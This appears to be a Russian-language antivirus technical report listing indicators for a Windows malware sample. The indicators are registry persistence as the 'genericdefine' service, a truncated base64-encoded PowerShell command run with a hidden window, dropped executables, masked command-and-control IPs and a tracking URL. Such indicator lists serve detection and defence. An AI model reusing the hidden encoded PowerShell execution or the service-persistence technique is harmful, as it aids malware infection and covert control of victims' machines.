Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\genericdefine] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\genericdefine] 'ImagePath' = '"%WINDIR%\SysWOW64\genericdefine.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...
- %HOMEPATH%\209.exe
- %HOMEPATH%\209.exe в %WINDIR%\syswow64\genericdefine.exe
- '86.##.221.170':80
- '18#.#44.61.73':443
- '18#.#4.252.13':443
- http://cp####soffers.com/track.cpleadsoffers.com/71yxxan/
- http://18#.##.252.13:443/window/
- DNS ASK cp####soffers.com
- '%HOMEPATH%\209.exe'
- '%WINDIR%\syswow64\genericdefine.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...' (со скрытым окном)